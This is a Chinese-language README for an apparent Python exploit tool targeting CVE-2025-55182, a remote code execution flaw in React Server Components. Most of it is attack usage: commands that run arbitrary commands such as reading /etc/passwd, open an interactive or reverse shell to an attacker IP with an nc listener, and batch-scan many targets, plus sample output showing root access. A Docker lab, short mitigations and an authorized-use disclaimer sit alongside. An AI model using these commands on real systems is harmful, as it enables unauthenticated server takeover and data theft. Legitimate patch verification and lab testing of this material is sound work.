基于Python的CVE-2025-55182(React Server Components RCE)利用,具有交互式shell、反向shell、批量扫描和基于Docker的易受攻击环境,用于授权安全测试。
| 属性 | 值 |
|---|
| CVE ID | CVE-2025-55182 |
| CVSS 评分 | 9.8 (严重) |
| 攻击向量 | 网络 |
| 攻击复杂度 | 低 |
| 所需权限 | 无 |
| 用户交互 | 无 |
| 影响 | 高 (机密性、完整性、可用性) |
| 受影响组件 | React Server Components (RSC) |
| 受影响版本 | React 18.x - 19.x (特定构建版本) |
| 披露日期 | 2025年12月3日 |
| CVE 别名 | React2Shell |
根本原因: React Server Components 在处理RSC负载时不正确地反序列化用户提供的JavaScript对象,允许攻击者注入在服务器上执行的恶意代码。
攻击向量: HTTP请求中的恶意RSC负载 影响: 无需认证的远程代码执行、服务器接管、数据泄露
# 克隆仓库
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju
# 安装依赖
pip install -r requirements.txt
# 安装依赖
pip install requests
# 在易受攻击的目标上执行命令
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"
# 交互式Shell模式
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell
# 自定义命令
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"
# 使用自定义IP/端口建立反向Shell
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
# 批量扫描
python exploit/batch_scanner.py -f targets.txt
# 详细模式
python exploit/cve_2025_55182.py -u http://target.com -v
# 自定义User-Agent
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"
cd target
docker-compose up -d
cd target
npm install
npm run dev
访问易受攻击的应用: http://localhost:3000
在易受攻击的服务器上执行单个命令:
python exploit/cve_2025_55182.py -u http://target.com -c "id"
预期输出:
[+] 漏洞检测成功:React Server Components RCE
[+] 执行命令: id
[+] 响应:
uid=0(root) gid=0(root) groups=0(root)
在易受攻击的服务器上获取交互式Shell:
python exploit/cve_2025_55182.py -u http://target.com --shell
功能:
建立反向Shell连接:
# 在攻击者机器上
nc -lvnp 4444
# 运行利用工具
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
扫描多个目标的漏洞:
# 创建目标文件
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF
# 运行批量扫描器
python exploit/batch_scanner.py -f targets.txt
升级React
npm install react@latest
# 升级到修复版本
阻止RSC请求
// 临时禁用RSC
const config = {
enableRSC: false
}
WAF规则
# 搭建易受攻击环境
cd target && docker-compose up -d
# 测试漏洞
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"
# 运行测试套件
python tests/test_exploit.py
此工具演示:
此项目采用MIT许可证 - 详见 LICENSE 文件。
重要: 此工具仅用于教育和授权安全测试目的。
使用此工具, 您同意:
如果您在生产系统中发现此漏洞:
向供应商报告
CVE分配
安全社区
记住: 安全研究应该始终是合乎道德和合法的。用您的技能使互联网更安全! 🛡️